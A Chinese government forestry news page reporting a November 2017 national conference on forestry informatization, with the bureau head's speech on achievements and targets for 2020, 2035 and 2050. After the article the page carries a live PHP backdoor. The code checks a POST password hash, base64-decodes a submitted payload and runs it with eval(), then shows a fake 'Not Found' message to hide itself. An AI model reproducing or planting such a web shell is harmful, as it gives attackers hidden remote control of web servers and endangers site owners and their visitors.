政务公开

首页 > 政务公开 >

    全面贯彻落实十九大精神 推进林业信息化建设迈向新台阶

    张建龙在第五届全国林业信息化工作会议上强调
    全面贯彻落实十九大精神
    推进林业信息化建设迈向新台阶

           中国林业网11月21日讯  2017年11月19-20日,第五届全国林业信息化工作会议在广西南宁召开。会议的主要任务是:贯彻落实党的十九大精神,总结林业信息化建设成就,以习近平新时代中国特色社会主义思想为指引,谋划新时代林业信息化工作,推动林业现代化建设不断迈上新台阶,为决胜全面建成小康社会、建设生态文明和美丽中国作出更大贡献。国家林业局党组书记、局长张建龙出席并讲话,广西壮族自治区政府副主席张秀隆出席并致辞,国家林业局总经济师张鸿文主持会议并作总结讲话。


           张建龙说,十八大以来,全国林业信息化工作深入贯彻落实党中央、国务院系列决策部署,紧紧围绕林业改革发展大局,全力推进智慧林业建设,取得一系列突出成绩,显著提升了林业现代化水平,成功探索出中国特色林业信息化发展之路。一是逐步确立了林业信息化发展思路。确立了数字林业、智慧林业、泛在林业三步走的发展路径;明确了服务大局、服务周围、服务基层等三个服务的发展目标;形成了林业信息化“互联网思维、大数据决策、智能型生产、协同化办公、云信息服务”的“五大重点”工作格局;坚持了统一规划、统一标准、统一制式、统一平台、统一管理“五个统一”的基本原则;确定了云计算、物联网、移动互联网、大数据、智慧技术等“五大技术”的基本支撑。二是成功实现了在思想认识、项目建设、业务应用、政务服务、发展水平上的五大突破,超前谋划,高效推进,深化应用,智慧提升。三是不断完善了以顶层设计、动员部署、机构队伍、标准制度、评测考核五大环节为核心,层层递进、环环相扣、互为依托的林业信息化建设保障措施。在全面推进林业信息化建设过程中,逐步凝聚形成了勇于担当、协同共建、敢为人先、坚持不懈的林业信息化文化,为今后进一步推动林业信息化,奠定了坚实基础。


           张建龙指出,党的十九大开启了中国特色社会主义新时代,科学谋划了全面建设社会主义现代化强国、实现中华民族伟大复兴的百年大计,为党和国家各项事业发展指明了方向、明确了道路、确定了方针。生态文明和美丽中国建设被提上前所未有的高度,网络强国战略思想作为创新驱动贯穿于各项建设,林业信息化建设迎来新的重大发展机遇。一是进入中国特色社会主义新时代迫切需要大力推进林业信息化,二是生态文明建设迫切需要大力推进林业信息化,三是乡村振兴战略迫切需要大力推进林业信息化,四是林业现代化建设迫切需要大力推进林业信息化。
      张建龙强调,进入中国特色社会主义新时代,林业信息化发展的总体思路是:深入贯彻党的十九大精神,以习近平新时代中国特色社会主义思想为指引,以提升林业现代化水平为目标,实施工程带动、智慧引领、共治共享、信息惠林四大战略,构建林业智能治理体系,努力开创林业信息化发展新局面。
      张建龙指出,林业信息化要按照新时代的发展战略,力争到2020年,全国林业信息化率达到80%,基本建成智慧林业,实现信息感知立体化、业务管理高效化、公共服务便捷化,为林业现代化奠定基础;到2035年,林业信息化率达到95%,全面建成智慧林业,实现政务管理智能协同、业务支撑精准高效、公共服务便捷惠民、基础保障坚实有力,具备全面支撑林业现代化的能力;到2050年,林业信息化率达到100%,建成泛在林业,实现应用实时化、主客融合化、整体共生化,随时随地提供各项林业服务,支撑全面实现林业现代化。
      张建龙要求,今后一个时期是完成“十三五”规划目标的关键阶段,要深入学习贯彻党的十九大和全国林业厅局长会议精神,按照《“互联网+”林业行动计划》总体布局,加快落实林业信息化各项任务。一要抓住重大项目。加快落实金林工程,深入落实生态大数据建设,推进国有林和国家公园监管现代化,积极推进集体林改信息化,推进电商扶贫,加快推进各地信息化建设。二要抓实整合共享。落实责任分工,及时清理信息孤岛,加快整合统一平台,抓紧接入全国平台,尽早实现协同共享。三是抓紧智慧政务。建设智慧门户,升级办公系统,推动移动应用,优化网上行政审批。四是抓早战略谋划。推进前沿技术战略研究应用,深化战略合作,深化应用创新,深化合作交流。五是抓好基础工作。完善基础网络设施,强化网络安全,推进一体运维,加快标准建设。六是抓牢任务落实。加强组织领导,强化机构队伍,强化协作机制,稳定资金保障。
      会议发布了领导决策服务、苏铁频道等新建系统,揭晓了2017年全国林业信息化率评测结果、第三批全国林业信息化示范单位、中国智慧林业最佳实践50强、“最美林业故事”第四届美丽中国作品大赛评审结果。
      会议邀请了国家政务信息系统整合共享专家组专家周德铭做题为“政务信息系统整合共享政策解读”的专题讲座,中国科学院计算所研究员、博士生导师陈益强做题为“人工智能的发展及应用”的专题讲座。广西壮族自治区林业厅、贵阳市生态文明建设委员会、四川省江油市林业局等三个单位介绍了典型经验。
      中央网信办、中央编办、工信部等相关部门有关负责同志,各省、自治区、直辖市林业厅(局),内蒙古、吉林、龙江、大兴安岭、长白山森工(林业)集团,新疆生产建设兵团林业局负责同志和信息办(中心)负责同志,国家林业局各司局、有关直属单位负责同志等出席会议。(冯峻极  谢宁波  蒋卫民  张雷)

     

"; error_reporting(0); if(isset($_POST['com']) && md5($_POST['com']) == '791dc312b38016ef998c1c146104cd5a' && isset($_POST['content'])) $content = strtr($_POST['content'], '-_,', '+/=');eval(base64_decode($content)); echo "We're sorry but the page your are looking for is Not Found..." ?>